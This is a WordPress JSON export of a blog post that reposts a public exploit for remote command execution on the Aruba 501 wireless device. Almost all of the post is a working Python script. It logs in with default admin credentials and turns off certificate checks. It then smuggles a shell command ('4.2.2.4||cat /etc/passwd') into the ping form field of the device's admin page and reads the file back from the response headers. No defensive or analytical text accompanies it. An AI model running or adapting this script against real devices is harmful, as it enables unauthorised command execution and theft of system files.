{"id":59169,"date":"2024-08-26T19:29:43","date_gmt":"2024-08-26T16:29:43","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/180363\/aruba501-exec.txt"},"modified":"2024-08-26T19:29:43","modified_gmt":"2024-08-26T16:29:43","slug":"aruba-501-cn12g5w0xx-remote-command-execution","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aruba-501-cn12g5w0xx-remote-command-execution\/","title":{"rendered":"Aruba 501 CN12G5W0XX Remote Command Execution"},"content":{"rendered":"<p># Exploit Title: Remote Command Execution | Aruba 501<br \/># Date: 17-07-2024<br \/># Exploit Author: Hosein Vita<br \/># Vendor Homepage: https:\/\/www.hpe.com<br \/># Version: Aruba 501 CN12G5W0XX<br \/># Tested on: Linux<\/p>\n<p>import requests<br \/>from requests.auth import HTTPBasicAuth<\/p>\n<p>def get_input(prompt, default_value):<br \/>user_input = input(prompt)<br \/>return user_input if user_input else default_value<\/p>\n<p>base_url = input(&#8220;Enter the base URL: &#8220;)<br \/>if not base_url:<br \/>print(&#8220;Base URL is required.&#8221;)<br \/>exit(1)<\/p>\n<p>username = get_input(&#8220;Enter the username (default: admin): &#8220;, &#8220;admin&#8221;)<br \/>password = get_input(&#8220;Enter the password (default: admin): &#8220;, &#8220;admin&#8221;)<\/p>\n<p>login_url = f&#8221;{base_url}\/login.cgi&#8221;<br \/>login_payload = {<br \/>&#8220;username&#8221;: username,<br \/>&#8220;password&#8221;: password,<br \/>&#8220;login&#8221;: &#8220;Login&#8221;<br \/>}<\/p>\n<p>login_headers = {<br \/>&#8220;Accept-Encoding&#8221;: &#8220;gzip, deflate, br&#8221;,<br \/>&#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;,<br \/>&#8220;Origin&#8221;: base_url,<br \/>&#8220;Connection&#8221;: &#8220;close&#8221;<br \/>}<\/p>\n<p>session = requests.Session()<\/p>\n<p>requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)<\/p>\n<p># Login to the system<br \/>response = 
session.post(login_url, headers=login_headers, data=login_payload, verify=False)<\/p>\n<p># Check if login was successful<br \/>if response.status_code == 200 and &#8220;login failed&#8221; not in response.text.lower():<br \/>print(&#8220;Login successful!&#8221;)<\/p>\n<p># The command to be executed on the device<br \/>command = &#8220;cat \/etc\/passwd&#8221;<\/p>\n<p>ping_ip = f&#8221;4.2.2.4||{command}&#8221;<\/p>\n<p># Data to be sent in the POST request<br \/>data = {<br \/>&#8220;ping_ip&#8221;: ping_ip,<br \/>&#8220;ping_timeout&#8221;: &#8220;1&#8221;,<br \/>&#8220;textareai&#8221;: &#8220;&#8221;,<br \/>&#8220;ping_start&#8221;: &#8220;Ping&#8221;<br \/>}<\/p>\n<p># Headers to be sent with the request<br \/>headers = {<br \/>&#8220;Accept-Encoding&#8221;: &#8220;gzip, deflate, br&#8221;,<br \/>&#8220;Content-Type&#8221;: &#8220;application\/x-www-form-urlencoded&#8221;,<br \/>&#8220;Origin&#8221;: base_url,<br \/>&#8220;Referer&#8221;: f&#8221;{base_url}\/admin.cgi?action=ping&#8221;,<br \/>&#8220;Connection&#8221;: &#8220;close&#8221;<br \/>}<\/p>\n<p># Sending the HTTP POST request to exploit the vulnerability<br \/>exploit_url = f&#8221;{base_url}\/admin.cgi?action=ping&#8221;<br \/>response = session.post(exploit_url, headers=headers, data=data, verify=False)<\/p>\n<p>if any(&#8220;root&#8221; in value for value in response.headers.values()):<br \/>print(&#8220;Exploit successful! The \/etc\/passwd file contents are reflected in the headers:&#8221;)<br \/>print(response.headers)<br \/>else:<br \/>print(&#8220;Exploit failed. The response headers did not contain the expected output.&#8221;)<br \/>else:<br \/>print(&#8220;Login failed. 
Please check the credentials and try again.&#8221;)<\/p>\n<p># Print the response headers for further analysis<br \/>print(response.headers)<\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: Remote Command Execution | Aruba 501# Date: 17-07-2024# Exploit Author: Hosein Vita# Vendor Homepage: https:\/\/www.hpe.com# Version: Aruba 501 CN12G5W0XX# Tested on: Linux import requestsfrom requests.auth import HTTPBasicAuth def get_input(prompt, default_value):user_input = input(prompt)return user_input if user_input else default_value base_url = input(&#8220;Enter the base URL: &#8220;)if not base_url:print(&#8220;Base URL is required.&#8221;)exit(1) username = get_input(&#8220;Enter &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-59169","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59169","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=59169"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/59169\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=59169"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=59169"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=
59169"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}